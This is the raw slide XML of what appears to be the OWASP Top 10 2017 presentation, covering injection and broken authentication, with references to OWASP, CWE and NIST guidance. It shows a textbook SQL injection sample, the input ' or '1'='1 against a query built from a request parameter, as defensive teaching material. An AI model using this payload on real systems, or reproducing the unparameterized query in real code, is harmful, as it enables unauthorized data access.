                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  WHERE custID=</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request.getParameter("id")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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/accountView?id=</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or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1</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ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) and dynamic application test (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Proactive Controls: Parameterize Queries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ASVS: V5 Input Validation and Encoding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Testing Guide: SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ORM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Cheat Sheet: Injection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OWASP Cheat Sheet: SQL Injection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3"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Injection Prevention in Java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4"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Query Parameterization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5"/>
              </a:rPr>
              <a:t>OWASP Automated Threats to Web Applications – OAT-014</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6"/>
              </a:rPr>
              <a:t>CWE-77: Command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7"/>
              </a:rPr>
              <a:t>CWE-89: SQL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8"/>
              </a:rPr>
              <a:t>CWE-564: Hibernate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9"/>
              </a:rPr>
              <a:t>CWE-917: Expression Language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20"/>
              </a:rPr>
              <a:t>PortS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>wigger: Server-side template injection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ru-RU"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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A1</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Technical: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hlinkClick r:id="rId22"/>
                        </a:rPr>
                        <a:t>Injection flaws</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rPr>
                        <a:t> occur when an attacker can send hostile data to an interpreter.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Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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4"/>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>lists of known passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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There may be authentication weaknesses if the application:</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Permits automated attacks such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Permits brute force or other automated attacks.</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Uses plain text, encrypted, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or weakly hashed passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU"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ru-RU" sz="90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ru-RU" sz="90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ru-RU" sz="90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ru-RU" sz="90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OWASP ASVS: V2 Authentication</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9"/>
              </a:rPr>
              <a:t>V3 Session Management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OWASP Testing Guide: Identity</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11"/>
              </a:rPr>
              <a:t>Authentication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OWASP Cheat Sheet: Authentication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OWASP Cheat Sheet: Credential Stuffing</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4"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Forgot Password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5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Session Management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5"/>
              </a:rPr>
              <a:t>OWASP Automated Threats Handbook</a:t>
            </a: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6"/>
              </a:rPr>
              <a:t>NIST 800-63b: 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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7"/>
              </a:rPr>
              <a:t>CWE-287: Improper Authentication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8"/>
              </a:rPr>
              <a:t>CWE-384: Session Fixation</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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>top 10000 worst passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or other modern, evidence based password policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use a server-side, secure,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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A2</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ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>applications</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>attacks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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12009</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1872</cp:revision>
  <cp:lastPrinted>2017-11-16T20:35:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-06T11:01:00Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>